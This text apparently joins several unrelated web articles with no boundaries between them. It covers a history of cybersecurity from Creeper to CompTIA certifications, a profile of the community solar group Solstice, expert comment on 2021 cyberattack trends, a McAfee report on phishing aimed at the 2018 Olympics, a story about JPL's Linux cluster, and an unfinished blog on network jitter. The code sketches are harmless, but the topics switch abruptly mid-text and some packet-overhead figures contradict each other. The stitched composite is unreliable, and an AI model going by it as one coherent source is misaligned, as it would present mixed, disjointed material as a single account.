The Evolution of Cybersecurity: Part 1
Written by: Lindsay McKay
The first hackers were not criminals and had no malicious intent. They were seen as technology enthusiasts whose only goals were to explore, optimize, and tinker. This type of hacker flourished in the 60s and 70s; it was not until the 1980s, when turnkey personal computers were widely available, that a new type of hacker emerged. These new hackers were concerned with personal gain. Instead of using their technological know-how to improve computers, they used it for criminal activities, including pirating software, creating malicious viruses, and breaking into systems to steal sensitive information. But wait: the first computer worm was developed in 1971, before the internet, so how did that work? Let's look through the history and evolution of the internet and cybersecurity, from the ARPANET to the commercialization of anti-virus software and the beginnings of recognition for the cybersecurity industry.
The ARPANET was the precursor to the internet. The first experiment in which two computers communicated with one another using packet-switching technology took place in 1965 in an MIT lab. Later, in 1969, the Pentagon's Advanced Research Projects Agency completed development of the ARPANET, interconnecting four university computers. The first message was sent on October 29, 1969, from UCLA to the Stanford Research Institute; the nodes at the University of California, Santa Barbara and the University of Utah were installed shortly afterward. Stanford's computer crashed before the message was completed.
In 1971, a developer working on the ARPANET created the first computer worm, known as 'The Creeper', a program that moved from one computer to another. To him it was a fun experiment, with its message reading: "I'm the creeper, catch me if you can." To combat the intrusion, a colleague created the first cybersecurity program, called 'Reaper', which scoured the ARPANET to find and delete the worm. Creeper was the first self-replicating program, and Reaper, itself a self-replicating program built to chase it, was the very first example of antivirus software. This cheeky battle between two coworkers became a moment of cultural significance, exposing the vulnerabilities within interconnected computers.
From Cheeky to Malicious
Before the 1990s, only academics, librarians, engineers, the military, and governments had access to the ARPANET. In 1991 the World Wide Web went public thanks to a British scientist, but prior to this, in 1988, a computer worm known as the 'Morris Worm' infected over 6,000 computers (about 10% of the network) connected globally to the ARPANET. Again, this worm had no malicious intent and may even have been released unintentionally by its author, a graduate student who launched it from MIT. The response to this worm was the creation of the Computer Emergency Response Team (CERT), whose role was to coordinate information and responses to computer vulnerabilities and security incidents. CERTs would become the first big players in the cybersecurity industry. While they were able to fight and respond to viruses as they came out, they were very much response teams, working only reactively and unable to prevent outbreaks.
Unfortunately, the 'Morris Worm' paved the way for the creation of malicious programs, which exploded with the launch of the World Wide Web and throughout the 90s. Email became the main vector for viruses, with 'ILOVEYOU' and 'Melissa' infecting tens of millions of computers and causing worldwide failures of email systems. During this time the anti-virus industry was booming, responding with products like McAfee, Norton Antivirus, and Kaspersky, which detected threats by scanning all the files on a system and comparing them to a database containing "signatures" of known malware.
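The signature-matching approach those products used can be sketched in a few lines of Python. This is an illustration of the idea rather than any vendor's actual engine: real scanners matched byte patterns inside files, whereas this sketch fingerprints whole files, and its one "signature" is simply the MD5 hash of an empty file, standing in for real malware.

```python
import hashlib
from pathlib import Path

# Hypothetical signature database. Real engines stored byte patterns
# extracted from known malware; a whole-file hash is the simplest
# stand-in for the same lookup. This entry is the MD5 of an empty file.
KNOWN_SIGNATURES = {"d41d8cd98f00b204e9800998ecf8427e"}

def is_infected(path: Path) -> bool:
    """Compare one file's fingerprint against the signature database."""
    return hashlib.md5(path.read_bytes()).hexdigest() in KNOWN_SIGNATURES

def scan_system(root: Path) -> list[Path]:
    """Scan every file under `root`, as the early products did,
    and return the paths that match a known signature."""
    return [p for p in sorted(root.rglob("*")) if p.is_file() and is_infected(p)]
```

The weakness that later pushed the industry toward behavioural analytics is visible here: change a single byte of the malicious file and its fingerprint no longer matches any signature.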
Cybersecurity Gets Recognized
People were becoming sick of only being reactive, and the need for regulation and for accessible cybersecurity education and resources for professionals was becoming apparent. During this time, many non-profits and certification associations established themselves, one of them being the Computing Technology Industry Association (CompTIA). Today, CompTIA is one of the most highly respected and reputable associations offering beginner-to-expert certification exams, and it partners with institutions worldwide to provide cybersecurity courses. In 1993, the first entry-level IT certification, the CompTIA A+, was launched. Following that, in 1999, the CompTIA Network+ certification exam was launched for those specializing in network technologies. Around the year 2000, there was a need for an entry-to-intermediate-level certification for professionals pursuing a career in information security, so CompTIA launched the CompTIA Security+ certification in 2002 to address it. After the largest data breach in history (the attack on Yahoo), the outlook for the information security industry was looking quite bleak. To tackle this gloomy time, CompTIA launched its first cybersecurity analyst certification, the CompTIA CySA+. Through the exam-prep course, professionals learn how to apply behavioural analytics to prevent and combat cyberattacks, and to support experts acting in the role of threat hunter.
Check out The Evolution of Cybersecurity: Part 2 to learn about different cybersecurity technologies, the rise of connected devices, cyberattacks on automobiles and more!
Are you prepared for an IT disaster? Check out How to handle an IT disaster without losing your cool on Innovation Networks.
Solstice's mission is to enable the 80% of US citizens - and particularly those from deprived areas - who are unable to install rooftop solar arrays on their homes to benefit from community-generated solar power instead. The number of people currently locked out of the market seems high, but it includes renters, low-income households, and those whose houses do not receive enough sun to make rooftop solar viable.
The idea works by setting up solar gardens in community spaces or solar farms on the rooftops of community buildings such as churches, schools and local employers. Community members sign up to the scheme without having to pay any upfront installation costs, and their array feeds electricity into the grid.
Households then simply receive their electricity as normal but are given credits on their bills for the energy produced, which amounts to savings of around 10% per year. They are also given access to an online management platform to sign either themselves or family and friends up to the scheme, manage their account, pay their bills and see how much they are saving.
The scheme’s first pilots were set up in 2015, but since then 13 projects have gone live in Massachusetts, New Jersey, Washington DC and just recently in New York. Between them, the arrays generate about nine megawatts of electricity, with each megawatt serving the needs of about 150 people. But the aim is to grow this capacity to 100 megawatts over the next couple of years in order to save 150,000 consumers about $36 million per year.
One way of doing this will be to launch an online marketplace over the next couple of months. The website will enable interested parties to enter their zip code into a search facility to see where the nearest project is to them. The idea here is that, although it is not necessary to live close to a solar garden to sign up to its services, it is a legal prerequisite that you reside in the same utilities zone.
But the most effective way of attracting new customers, believes founder and chief executive Stephanie Speirs, is to use the same viral community organising tactics that were employed when she managed field operations for former President Obama’s election campaign. She explains:
According to a Yale study, the adoption of solar is contagious so once one person does it, others follow. So if we sign up early adopters such as churches and workplaces, we see their congregations and workers sign up too. There’s a contagion effect.
Cost-effective business model
As to the not-for-profit organisation’s business model, Speirs points out that it partners with a number of solar technology developers, which install the arrays and pay Solstice to manage their customer base. She says:
We get money from the solar developers who pay us for managing their customers, which is what we’re good at. Government regulations mean that financing doesn’t come and projects aren’t built until you line up customers so that’s what we do.
Although a good number of commercial solar players in the US have gone bust lately, Speirs believes that Solstice’s approach is simply more cost-effective. She explains:
A lot of solar companies are going bust due to high customer acquisition costs. Solar is sold in just a few ways – there’s door-to-door canvassing or someone will have a stand in a home improvement store. Both are very effective but they’re also very expensive as it’s stranger-to-stranger contact. But we’re cheaper because we rely so much on peer-to-peer communication to enrol customers. There’s an element of trust in relation to energy and so recommendations need to come from a trusted source.
Because the US market for community solar is new and in the process of “proving itself”, the goal is to focus for now on the domestic market, before expanding out elsewhere, not least into the developing world. As Speirs concludes:
I’d been working in India and Pakistan, but I realised that I didn’t have to be halfway across the world to deal with solar access issues. Low-income people - like my mom - were unable to get solar access so I wanted to work in an environment that I understood and where I could make a real difference.
Each of the winners of GLG’s Social Impact Fellowship are on the cusp of change. They have taken what are in essence simple ideas and applied them to seemingly intractable situations where there is a genuine need for change, using technology as both an enabler and, as Speirs calls it, an “amplifier”. The next, and perhaps even trickier stage in some ways, will be to develop and grow their businesses in a long-term sustainable way. We wish them luck.
Cyberattacks in the first half of 2021 have escalated globally to affect virtually every industry. Earlier this year TechNewsWorld spoke with cybersecurity experts about the expanding threat landscape, imminent threats, and what can be done to counter the ongoing offensives against the IT systems of companies, organizations, and government agencies.
Some cybersecurity experts agree with a report by Cybersecurity Ventures and expect financial damages from cybercrime to reach $6 trillion by the end of this year. Industry studies show that cyberattacks are among the fastest-growing crimes in the United States.
Cyberattacks are absolutely on the rise. Based on everything we know and every single analyst we have spoken with, there is no doubt that attacks are increasing, according to Robert McKay, senior vice president, risk solutions at Neustar.
“Cybersecurity experts predict that in 2021 there will be a cyberattack incident every 11 seconds. This is nearly twice what it was in 2019 (every 19 seconds), and four times the rate five years ago (every 40 seconds in 2016),” he told TechNewsWorld.
The rapidly growing increase in cyberattacks worldwide comes at a hefty cost for businesses in order to better protect their computer networks from intrusions. Cyberattacks not only are increasing in frequency, but they are costing victims larger financial losses.
The Growing Price of Cyber Risk
Worldwide, cybercrime cost businesses, government agencies, and consumers in general more than $1 trillion in 2020, according to the data analyzed by researchers at Atlas VPN. That is around one percent of the global GDP.
While $945 billion was lost to cyber incidents, $145 billion was spent on cybersecurity. Those costs increased by more than 50 percent compared to 2018, when over $600 billion was spent to handle cybercrime.
But twenty percent of organizations worldwide have no plans on how to protect against cybercrime events, according to the Atlas VPN report. That leaves a gaping hole in networks that cybercriminals can exploit to extend their attack strategies and steal millions of dollars more.
The only sure defense, warn cybersecurity experts, is to step up efforts to pass legislation that bolsters technological defenses. That may be the only way to alter the course of ongoing cyberattacks.
Despite all the efforts into protecting systems and data, cloud breaches are likely to increase in both velocity and scale, said John Kinsella, chief architect at Accurics about his company’s 2020 summer research report on the State of DevSecOps.
“This [analysis] comes as cloud breaches have been rampant over the last two years. More than 30 billion records have been exposed as a result of cloud infrastructure misconfigurations,” he told TechNewsWorld.
In order to keep pace with an evolving economy that requires more digital transformation, organizations must place cyber resilience and the practice of DevSecOps at the top of their priority list, he added.
Not Just in the Clouds
The growing pace of cyberattacks stems from much more than rampant migration to cloud storage and misconfigured cloud infrastructure. Still, misconfigurations in cloud infrastructure lead to data exposure and are among the biggest cyberthreat concerns facing businesses and government agencies today, noted Kinsella.
Nearly 98 percent of all cyberattacks rely on some form of social engineering to deliver a payload such as malware or ransomware. One of the most successful attack formats cybercriminals use regularly to initiate a social engineering attack is through phishing emails. Therefore, threat actors distribute malware via email approximately 92 percent of the time.
Cloud use and the continued stampede to cloud services are not going away. That ongoing shift in computing practices must be managed with more vigilance.
COVID has accelerated organizations’ digital transformation. Therefore, the ability to set up workloads in the cloud and get them through compliance and security challenges is in demand, noted Mohit Tiwari, co-founder and CEO at Symmetry Systems.
“Part of the reason is that the workloads that had resisted moving to the cloud were exactly the highly regulated ones, and the forced move out of on-site data centers managed by IT staff is driving up demand for cloud-based compliance and security skills,” he told TechNewsWorld.
Thus, cloud-based security techniques will be vital in the fight to curtail the worsening cybersecurity landscape. These include learning to work with cloud-native identity and access management (IAM), he noted.
“Those looking after cloud-based security need to broadly learn to manage infrastructure through structured programs, instead of shell scripts pieced together. As networks and application tiers become ephemeral, the most important persistent asset for any enterprise will likely be their own and their customers’ data. So data-security on the cloud will be a major theme going forward,” he cautioned.
Providing Cloud Cover
The world pandemic has hastened the cyber intrusions. So has complacency and poor training among office workers and inadequate IT surveillance.
Organizations need to consider a balanced approach to training their employees and investing in automation tools to minimize the risks of cyberattacks, offered Brendan O’Connor, CEO and co-founder at AppOmni. Extensive training and around-the-clock manual monitoring are not necessary when the right automation tools can complement the IT staff as they build up their skill set.
“IT workers specializing in security need to shift their focus to supporting the new model of business many enterprises are adopting. Some enterprises are shifting their business model to focus on virtual workforce, de-emphasizing the need to secure office networks,” O’Connor told TechNewsWorld.
In other cases, offices are being eliminated altogether. IT workers need to change their focus from traditional network security of a campus/office to application security of the work-anywhere model, he continued.
“With the employee location and devices under constant flux, organizations will rely on the consistency and security of cloud service applications. IT workers should look to the management and security of these SaaS (software as service) applications as the new skills and technology to embrace,” O’Connor said.
Over the next year, ransomware will continue to be the biggest threat and financial risk to enterprises, observed Joseph Carson, chief security scientist and advisory CISO at Thycotic. Most organizations should be very concerned about ransomware as the biggest cybersecurity challenge and threat, he advised.
“Organizations should prioritize to invest in security solutions that help reduce the risks and also plan and test an incident response plan to help ensure the business is resilient to high-risk attacks,” he told TechNewsWorld.
Ransomware continues to evolve into more than just a security incident. Organized cybercrime groups now steal the data before encrypting it on corporate servers, turning each attack into a data breach as well. Companies are not just worried about getting their data back, but also about who it gets shared with publicly.
Cybercriminals use ransomware to target anyone, any company, and any government including hospitals and transportation industries at a time when they are under extreme pressure, Carson added.
Another major cybersecurity attack trend focuses on the protective tools and security vendors within the industry, noted Brandon Hoffman, chief information security officer at Netenrich. The tools that the industry relies on and their providers are becoming more targets for attacks.
“It is a big concern because practitioners need tools they can depend on for detection and defense. By crippling or repurposing the very tools meant to thwart these attempts, the adversaries stand to gain a complete upper hand in the ongoing battle to combat cyber threats,” Hoffman told TechNewsWorld.
“The attacks targeting security organizations and vendors were always high up on the adversary list, but success begets further success.”
Fighting the Battle
The trust factor is an internal battle of sorts between security vendors and the corporations hiring them for cyber protection. That trust must be constantly reassessed, suggested Tim Wade, technical director of the CTO Team at Vectra AI.
“Strategically, security practitioners must continue to pivot away from preventative-based security architecture into resilience-based security architecture,” Wade told TechNewsWorld.
That is where the focus shifts to accepting the reality that things will go wrong, but when they do, the impact is minimized through rapid detection, response, and recovery, he added. Vendors and suppliers have always been lucrative targets for adversaries.
Many of the cyberattackers belong to organized criminal gangs that are sanctioned by foreign nations. The best defense against such adversaries is acknowledging that you cannot stop them, and then focusing on making their lives as difficult as possible, Wade said.
Cybersecurity Higher Education
One of the often unspoken ways of safeguarding against cybersecurity assaults is through education. This approach goes beyond teaching company workers to be better aware of safe computing ideals. Rather, recruiting the next crop of computer specialists to pursue a degree in cybersecurity.
Cybersecurity prospers because so many professionals come from different backgrounds and skill sets, noted Heather Paunet, senior vice president at Untangle.
“Groups who are traditionally marginalized in other industries, when pivoting or starting a career in cybersecurity, can benefit from multiple industry-leading organizations offering certification programs,” she told TechNewsWorld.
The emerging field of cybersecurity is a very viable career path, noted Michael Kaczmarek, vice president of product management at Neustar. Industry reports show that the number of unfilled cybersecurity jobs is expected to grow by 35 percent.
“Given the increases in attacks and the changes in tactics used by bad actors and organizations, cybersecurity will most certainly be a career choice that will see net employment for the long term,” he told TechNewsWorld.
The demand for cybersecurity jobs has certainly increased in the past year, agreed Dov Lerner, security research lead at Cybersixgill. A career path in the field is a great choice for someone interested in IT and security.
“An increase in the number of tools utilized increases security operations and analytics complexity and requires an increase in personnel. However, according to a recent ESG survey, nearly 70 percent of security teams say it is difficult to recruit and hire additional SOC (security operations center) staff,” Lerner told TechNewsWorld.
Security analysts have the opportunity to impact more than just their specific industry. Cybersecurity reaches into the world of politics, economics, and other sectors of the world. While breaking into the field can be challenging, it is incredibly rewarding, he concluded.
With the opening ceremonies of the 2018 Winter Olympic Games just days away, hundreds of thousands of spectators and competitors are arriving in PyeongChang County, South Korea. The Olympic Games are a grand showcase of athleticism and patriotism—but they also create security challenges, including the increased risk of cyber attacks.
When events of this magnitude occur, they are bound to become the target of opportunistic attacks by cybercriminals, and this year’s Olympic Games is no exception. McAfee Advanced Threat Research analysts have recently discovered an email phishing campaign primarily targeting organizations involved with providing infrastructure and support for the games. The emails contained a malicious payload that establishes an encrypted channel from the victim’s machine back to the attacker’s server, allowing them to execute commands remotely as well as install further malware.
Large events with many contractors are a lucrative target for cyber attacks. The Olympics faces unique challenges being a multinational event, as language barriers present opportunities for attacks that play on imperfect translations or lack of knowledge about government entities. In the attack uncovered by McAfee, the emails appeared as though they came from the National Counter-Terrorism Center (NCTC) in South Korea, which at the time was conducting drills in the region in preparation of the Games.
This recent incident is just one example of a cybersecurity issue in the Olympic Games. According to a 2017 report titled “Report on the Cybersecurity of Olympic Sports” from the UC Berkeley Center for Long-Term Cybersecurity, the most recent Olympic Games have faced a number of serious cybersecurity incidents. During the 2008 Beijing Olympics, security officials fielded 11 million to 12 million daily alerts, with roughly a half dozen falling into the imminent threat category, according to the report. And in the 2012 Summer Olympics in London, six major security incidents—five of which involved DDoS-related attacks—were brought to the attention of the event's CIO. Last year, at the conclusion of the Rio Olympic Games, Russian hackers pilfered medical records of athletes from the World Anti-Doping Agency.
While the U.S. won’t host the Olympic Games until 2028 in Los Angeles, U.S. officials are already considering cybersecurity threats for the high-profile event. According to the UC Berkeley report—which was supported by the Los Angeles Organizing Committee for the 2028 Olympics—the Olympic Games in the coming years are likely to face far more serious cyberattacks, and ones that will be more difficult to detect.
Security for large events such as the Olympics falls on all vendors, regardless of business type. For example, just one unsecured email server at one vendor has the potential become a relay for phishing emails directed at participants or government agencies. It’s important for all organizations and individuals participating in the Games to understand the most prominent risks, and diligently work to mitigate them.
While history shows us there are bound to be more cyber incidents because of the Games, let’s hope that with increased security efforts there will be little disruption at the hands of cyber criminals over the next few weeks.
Accurately modeling climate issues is a huge computational task. The National Weather Service’s supercomputers, for instance, have a hard enough time generating accurate local weather forecasts just a few days out. So imagine trying to generate accurate forecasts on a global scale 50 years into the future. This is causing particular consternation when it comes to proving that man-made chemicals are causing global warming.
“Due to the complexity of climate systems and current limitations of climate models, it may take 10 or 20 years to develop clear observational or modeling proof of global warming causes,” says Dr. Jonathan H. Jiang, a scientist from the Microwave Limb Sounder (MLS) team at NASA’s Jet Propulsion Laboratory (JPL) in Pasadena, Calif. (See sidebar for explanation of what the team does.) “By that point it might be too late for us to prevent the climate changes.”
To speed the process, MLS is now hooked into the national TeraGrid, which connects large-scale Linux clusters, using 64-bit Intel Itanium processors, at the Argonne National Laboratory, Caltech, the National Center for Supercomputing Applications and the San Diego Supercomputer Center.
The sites are linked via 30-40 Gbps connections and have a combined computing capacity of 15 (soon to be 21+) teraflops and storage capacity of more than seven petabytes.
What Is A ‘Microwave Limb Sounder’?
It is an instrument that detects naturally occurring microwaves in Earth’s upper atmosphere, or “limb.” (“Limb” is an astronomy term meaning “the apparent outer edge of a celestial object.”) The first MLS was part of the Upper Atmospheric Research Satellite and helped identify how chlorine compounds were depleting the ozone layer. The next MLS will be part of the Aura satellite, launching in January 2004. It will be addressing a broad range of climate change issues. For more information go to the MLS site.
The MLS has also boosted its own local computing power. The team members were already outfitted with Linux workstations with dual 1GHz Pentium III processors and 2 GB of RAM. Since these systems are on same subnet, the 25 workstations were set up using homegrown software to act as a single parallel computing system. Applications are developed in house using Fortran 95.
Given the high-intensity computing needed to convert the raw satellite data into usable information, however, that still wasn’t enough power. Rather than adding a mainframe, the MLS team decided to add a cluster using the same software it was using to run the grid.
“We were quite pleased with the results we had gotten with our grid,” says Navnit Patel, a contractor from ERC Inc. who operates as the team’s Science Computing Facility Manager.
“We also wanted to have clusters of nodes acting as a parallel system so that if one or more client nodes went down it wouldn’t affect the cluster,” he said.
A key point in selecting a vendor for the cluster was that it had to operate seamlessly with the software already in place. The cluster would be supplementing rather than replacing the existing workstation grid, so JPL wanted it to run on the same distributed computing software. After testing the units from several manufacturers, they awarded the contract to IBM.
The new hardware consisted of 64 IBM X330 series 1U rack-mount servers, model 8674-11x, with dual 1 GHZ CPUs and 2 GB RAM. The operating system was Red Hat Linux 7.3. IBM had already installed and configured the hardware into three racks and had conducted extensive burn-in tests on all the systems.
An IBM technician came out to JPL to finish the installation. Since all the wiring had already been done at the factory, he just had to connect the three racks to the master node, install the management software, and configure the master node and the clients.
“It was quite a smooth operation,” says Patel.
The users have access to the master node right from their desktops. The user tells the master node how many nodes or CPUs he wants to use to get the job done, and the master node then allocates the job to the appropriate number of available client nodes.
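That dispatch pattern (ask for a number of nodes, let the master split the job) can be sketched with Python's standard library. This is a toy stand-in for JPL's homegrown scheduler, whose applications were written in Fortran 95: a trivial sum takes the place of a real data-processing job, and threads take the place of physical client nodes.

```python
from concurrent.futures import ThreadPoolExecutor

def process_chunk(chunk):
    # Stand-in for one client node's share of the work
    # (the real jobs processed slices of raw satellite data).
    return sum(chunk)

def run_job(data, n_nodes):
    """Mimic the master node: split the job into one chunk per
    requested node, dispatch the chunks concurrently, and combine
    the partial results."""
    chunks = [data[i::n_nodes] for i in range(n_nodes)]
    with ThreadPoolExecutor(max_workers=n_nodes) as pool:
        partials = list(pool.map(process_chunk, chunks))
    return sum(partials)
```

The answer is the same whatever node count the user requests; only the degree of parallelism changes, which is the property that let the MLS team grow the cluster without rewriting their applications.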
“Everyone is using this cluster to its maximum capacity,” says Patel. “So far we are happy with the performance of the cluster.”
Of course, as Patel’s “maximum capacity” and “so far” imply, an upgrade is on its way. JPL has just ordered an additional 64 client servers for the cluster. This time they are coming from Linux NetworX Corp. (based in Salt Lake City) and come with dual 2GHz processors. Once these arrive, they will work together with the existing IBM servers, making a total of 256 CPUs available.
Patel attributes the success of his cluster to requiring the equipment be benchmarked with the software that would actually run on it. This is particularly applicable in a situation like JPL’s, in which all the software was written by the MLS scientists.
“The best advice I can give is to insist on a successful benchmark,” he says. “Any software you intend to run on the cluster should be benchmarked.”
What is Jitter and should we care about it?
This blog is Part 2 of a 3 part blog and concentrates on jitter (variable latency). Part 1 dealt with distance, latencies and orbits and subsequent parts will discuss the effect of atmospheric conditions and choice of wavebands.
First, it’s worth noting that while the term jitter is used by network specialists and certain application performance engineers, it isn’t really a network term at all – it’s a communication engineer’s term – and essentially refers to the difference between when a timing signal should have been received and when it was actually received.
So, in an ideal world, if you transmit a signal (down a wire or as a wave) a million times a second (1 MHz) at even spacing, then that’s what you expect to receive: 1 pulse at exactly every microsecond (millionth of a second). That’s not to say that the pulses might not all be delayed (perhaps due to distance), but the expectation is that they are all delayed by the same amount, so the jitter is 0. Unfortunately real life is not like that, and signals can arrive relatively too early or too late. This is jitter.
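That definition can be expressed in a few lines: compare each arrival against its ideal, evenly spaced slot. A minimal sketch computing peak-to-peak jitter (the sample timings are made up):

```python
def jitter(arrival_times, period):
    """Deviation of each arrival from its ideal, evenly spaced slot.

    A constant delay on every pulse gives zero jitter; only the
    *variation* in delay counts.
    """
    t0 = arrival_times[0]
    deviations = [t - (t0 + i * period) for i, t in enumerate(arrival_times)]
    return max(deviations) - min(deviations)  # peak-to-peak jitter

# 1 MHz signal: one pulse expected every microsecond.
period = 1e-6
on_time = [i * period + 0.005 for i in range(5)]  # all delayed 5 ms equally
jittery = [0.0, 1.2e-6, 1.9e-6, 3.1e-6, 4.0e-6]   # uneven spacing

print(jitter(on_time, period))   # 0.0 – constant delay is not jitter
print(jitter(jittery, period))
```

Note that the uniformly delayed stream reports zero jitter, exactly as described above.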
Packet Delay Variation (PDV)
In networks, and application engineering, data is typically grouped together and transmitted as packets. So the correct term (for packet type jitter) is Packet Delay Variation (PDV) but we’ll use the term Jitter to mean the same thing i.e. PDV.
What is affected by Jitter?
Let’s begin with what isn’t really affected by Jitter – Connection orientated applications
Now, jitter doesn’t matter to most “standard” applications i.e. applications based on the TCP part of the IP protocol family. These include most “transactional” and “file transferring” applications like:
● Web – http and https
● Network file systems – CIFS (NetBIOS over TCP), NFS
● File transfer – ftp, sftp
● Custom TCP communications – various messengers, apps
● Video/Audio Services – Netflix, Internet radio (* we’ll come back to this one)
The reason for this is that they are not especially time-sensitive and are often themselves waiting for acknowledgement of successful packet delivery before they can transmit more data i.e. they are inherently jittery in themselves.
The jitter problem typically all starts when you are trying to stream live audio or video, a telephone call, live telemetry or timing protocols over a network. As mentioned, the network doesn’t send a bit stream, rather it generally sends it as a packet stream (the packet being the basic unit of transmission in most modern data networks) with a regular time gap between packets.
So, you try to send a packet containing audio samples (for example), say 1000 times a second so that the playback system can play them back as sounds, but they don’t arrive with that spacing due to jitter (PDV) and so the played sound is all over the place.
Wait, you say, that doesn’t actually happen in real life. No indeed, because two primary solutions to this have been adopted:
1. The application is not actually real-time!
The stream does not actually need to be real time – e.g. internet radio, Netflix (see, I said we’d be back here!) – because you can buffer (receive in advance) a large chunk of data (20 seconds, for example) and play the samples back evenly spaced. As discussed in the streaming audio example below, each packet will likely even carry more than one sample.
You can do this because you know the encoding/decoding system (codec) and its data rate. You also know that it doesn’t matter if one consumer hears/sees the station/program a little later than another, in general.
2. It is real-time, but you can delay playback a bit
Our example here would be a telephone call. We clearly can’t delay the speech for many seconds as it interferes with our brain’s speech processing, as many of us have experienced when things go wrong on long distance telephone calls. But we can hold the packet playback back slightly.
The technique uses a jitter buffer (perhaps more properly should be called an anti-jitter buffer!). Packets are stored in the jitter buffer (in the correct order) and then played back at an even speed thus sorting out the audio. The problem here is that this buffer cannot be too large because “we” notice. Humans will usually notice round-trip voice delays of over 250ms. The ITU (International Telecommunications Union) recommends a maximum of 150 ms one-way latency (300ms round trip). Remember that (from Part 1) a satellite phone call via a GEO satellite will easily exceed 300ms even with no jitter present, though LEOs (like Iridium) and MEOs (like O3b) don’t suffer this basic very high latency due to them being much closer to us.
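A jitter buffer of this kind can be sketched as a fixed playout delay: packet i is scheduled at first-arrival + delay + i × period, and anything arriving after its slot is late (and would be discarded in a real phone). The timings and function name below are illustrative:

```python
def playout_times(arrivals, period, buffer_delay):
    """Fixed-delay jitter buffer: schedule packet i at
    first_arrival + buffer_delay + i * period; count late packets."""
    base = arrivals[0] + buffer_delay
    schedule, late = [], 0
    for i, t in enumerate(arrivals):
        slot = base + i * period
        if t > slot:
            late += 1
        schedule.append(slot)
    return schedule, late

period = 0.020                                    # one voice packet every 20 ms
arrivals = [0.000, 0.024, 0.039, 0.071, 0.080]    # jittery network delivery

# A 10 ms buffer hides moderate jitter...
_, late_small = playout_times(arrivals, period, buffer_delay=0.010)
# ...a bigger one hides more, at the cost of added latency.
_, late_big = playout_times(arrivals, period, buffer_delay=0.015)
print(late_small, late_big)
```

This is the trade-off in miniature: the larger buffer loses no packets but adds 5 ms to every sample, which is why the buffer cannot simply be made huge.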
Streaming Audio Example
As an example, let’s design a streaming protocol for uncompressed audio CD data over a network. Now, CD audio has a stereo bit rate of 1.4112 Mbps. This is made up of 44,100 samples per second and each sample uses 16 bits per channel (so for stereo that’s 2 channels – 32bits per sample). I mentioned that data networks use packets, so we could put every 32 bit (4byte) sample into a packet and then send them evenly spaced to get 44.1K samples per second.
The problem is that packets have a minimum size and lots of overhead (addressing, checksums etc). It would be like sending 4 passengers in a 40-seat coach – lots of overhead and waste. For Ethernet frames carrying IPv4 and UDP packets, the overhead would be 14 + 20 + 8 + 4 = 46 bytes – just to send 4 bytes of data! And that ignores the fact that “Layer 2” frames like Ethernet have a minimum size – 64 bytes in Ethernet’s case. So for 4 bytes of valuable data we’d be sending a 64-byte frame – 16 times the payload – for a bit rate of roughly 22.6 Mbps. Outrageously high for most networks and an impossible waste for a satellite network!
So instead we’ll pack lots of audio samples into one larger packet, because the overhead will always be 46 bytes. A typical large packet carries 1500 bytes of layer-2 payload, of which 32 bytes are overhead (IPv4, UDP & checksum), so it can carry (1500-32)/4 = 367 audio samples, and our packet rate would need to be 44,100/367 = 120.16 packets per second – a pretty modest rate of about 1 packet every 8 milliseconds. However, our audio playback system now has to cope with that: store (buffer) incoming packets, decode them, and play back the individual samples at a steady rate. [In practice the codec we just “designed” above won’t be used, as one involving compression like MP3 will use far less bandwidth.]
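The arithmetic is worth checking end to end. Recomputing it (note that the one-sample-per-packet case works out to ~22.6 Mbps with a 64-byte minimum frame):

```python
ETH_OVERHEAD = 14 + 20 + 8 + 4   # Ethernet hdr + IPv4 + UDP + FCS = 46 bytes
MIN_FRAME = 64                   # minimum Ethernet frame size
SAMPLE_BYTES = 4                 # 16-bit stereo sample = 32 bits
SAMPLE_RATE = 44_100             # CD audio samples per second

# One sample per packet: each 4-byte sample rides in a 64-byte frame.
naive_bps = MIN_FRAME * 8 * SAMPLE_RATE
print(f"one sample per packet: {naive_bps / 1e6:.1f} Mbps")

# Pack samples into a 1500-byte payload (counting 32 bytes of
# IP/UDP overhead inside that payload, as above).
samples_per_pkt = (1500 - 32) // SAMPLE_BYTES   # 367
pkt_rate = SAMPLE_RATE / samples_per_pkt        # ~120 packets/s
print(f"{samples_per_pkt} samples/packet -> {pkt_rate:.2f} packets/s")
```

Packing samples cuts the packet rate from 44,100 to about 120 per second, which is why every practical streaming protocol batches samples.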
[Figure: how an original audio wave is sampled at various quality levels.]
Applications/Protocols that can’t tolerate much jitter
It all comes down to how real-time your application needs to be. Perhaps it’s worth thinking about what “real-time” means. Techtarget.com has the following definition:
“Real-time is a level of computer responsiveness that a user senses as sufficiently immediate or that enables the computer to keep up with some external process (for example, to present visualizations of the weather as it constantly changes). Real-time is an adjective pertaining to computers or processes that operate in real time. Real time describes a human rather than a machine sense of time.”
I like that definition because they explain that real-time responsiveness is all relative to your need. If you’re controlling a space rocket you’ll likely need to respond far faster than if you’re having a conversation with a human. It’s all relative.
So, if you’re remote controlling an aircraft you might need real time to be pretty low in latency, and therefore having large jitter buffers to smooth out a jittery flow of packets coming from a control “joystick” won’t work.
These applications cannot, therefore, use TCP over IP: the acknowledgment process alone could slow things down too much and itself cause jitter. Instead they tend to use an underlying datagram protocol like UDP, which is not acknowledged. Because packets are not acknowledged, if their loss matters then some form of redundancy is required – simple redundant designs might send each packet twice, or have each packet also carry data from the preceding and following packets. These schemes tolerate a high packet error/loss rate but use a lot of extra bandwidth, so in practice schemes better suited to the likely error/loss rates are employed.
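The simplest of the redundancy schemes mentioned – sending every packet twice – can be sketched as follows (a toy model, not a real protocol; the packet names are made up):

```python
def transmit_with_duplication(packets, lost):
    """Send every packet twice; the receiver keeps the first copy that
    survives. `lost` is a set of (seq, copy) pairs dropped in flight."""
    received = {}
    for seq, payload in enumerate(packets):
        for copy in (0, 1):
            if (seq, copy) not in lost and seq not in received:
                received[seq] = payload
    return [received.get(seq) for seq in range(len(packets))]

packets = ["p0", "p1", "p2", "p3"]
# Lose one copy of p1 and *both* copies of p3.
lost = {(1, 0), (3, 0), (3, 1)}
print(transmit_with_duplication(packets, lost))
# -> ['p0', 'p1', 'p2', None]  (p1 recovered, p3 unrecoverable)
```

Duplication doubles the bandwidth to survive any single loss – which is exactly why real systems choose schemes matched to the expected loss rate instead.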
What creates Jitter?
Now that we’ve looked at whether we should care about jitter, it’s worth understanding why it occurs.
Networks are pretty good at creating jitter even without help at all from any satellite equipment. As packets pass through routers (the junctions, roundabouts and rotaries of a data network) they may need to wait for packets from other streams and so they are queued and therefore, delayed. The next packet may not be similarly delayed or may be delayed even more – all of a sudden you have jitter.
Satellite networks also throw a few other things into the mix, but which of these you get depends on the satcoms design, and they are evolving. Examples include:
● Jitter introduced by the Terminal/Modem – Depending on the transmission model you may need to wait until it is your turn (slot) to transmit data up to the satellite, if other users in the same area are sending.
